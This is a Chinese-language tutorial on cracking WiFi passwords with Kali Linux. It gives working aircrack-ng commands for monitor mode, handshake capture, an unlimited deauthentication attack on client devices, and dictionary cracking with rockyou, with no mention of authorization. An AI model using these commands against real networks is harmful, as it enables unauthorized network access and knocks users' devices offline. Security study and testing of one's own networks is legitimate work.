1. 程式人生 > 實用技巧 >利用KALI暴力破解WIFI密碼

利用KALI暴力破解WIFI密碼

0x01 準備工作

利用kali破解wifi密碼,需要在虛擬機器裡安裝kali系統,併購買一個支援監聽的外接USB網絡卡!

0x02 開始

插入usb網絡卡並檢視

開啟kali虛擬機器,插入usb無線網絡卡,選擇連線kali虛擬機器

開啟終端輸入:

iwconfig

檢視無線網絡卡

airmon-n

該命令列出了支援監控模式的無線網絡卡,如果沒有任何輸出,則表示無線網絡卡不支援監控模式。

記下Interface名稱,開啟網絡卡的監聽模式

airmon-ng start wlan0

如果出現結果如下圖,說明還有其他網絡卡處於監聽狀態,需要先將其關閉

airmon-ng check kill

再次開啟監聽模式,並記下其Interface

airmon-ng start wlan0

掃描訊號

掃描附近的wifi訊號

airodump-ng wlan0mon

找到自己的目標wifi後使用 Ctrl+c 中止

  • BSSID  AP端的mac地址
  • PWR 訊號強度(絕對值越小,訊號越強)
  • Data 對應路由器的線上資料吞吐量,數值越大,數值上傳量越大
  • CH 對應路由的頻道
  • ESSID 對應路由器的名稱

抓取握手包

輸入命令:

airodump-ng -c 6 -w ./test --bssid 24:16:6D:21:D1:E0 wlan0mon
airodump-ng -c <AP通道> -w <抓取握手包後存放位置名稱> --bssid <AP的mac地址> <interface名稱>

這裡需要有裝置與路由傳輸資料才可以。

解除認證攻擊

保持命令視窗處於執行狀態,再開啟一個新的命令視窗,進行解除認證攻擊,即強制連線到目的wifi路由的裝置重新連線。

aireplay-ng -0 0 -a 88:C3:97:31:E8:9D -c C0:EE:FB:4F:A2:7F wlan0mon
aireplay-ng -<攻擊模式,這裡使用持續攻擊(0)> [攻擊次數,0為無限攻擊] -a <AP端的MAC地址> -c <被攻擊裝置的MAC地址> <interface名稱> 

當下圖所示位置顯示 WPA hankshake 即成功抓到握手包,將兩個命令框都輸入 Ctrl + C 終止攻擊和握手抓包。

關閉無線網絡卡監聽模式

airmon-ng stop wlan0mon

0x03 使用字典暴力破解

kali自帶有一份無線wifi密碼字典,但是需要先解壓

gzip -d /usr/share/wordlists/rockyou.txt.gz

爆破

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 88:C3:97:31:E8:9D test-01.cap
aircrack-ng -w <指定字典> -b <目的路由MAC地址> <握手包>

爆破成功後,如圖區域會顯示 KEY FOUND![ 密碼 ]

大功告成!!!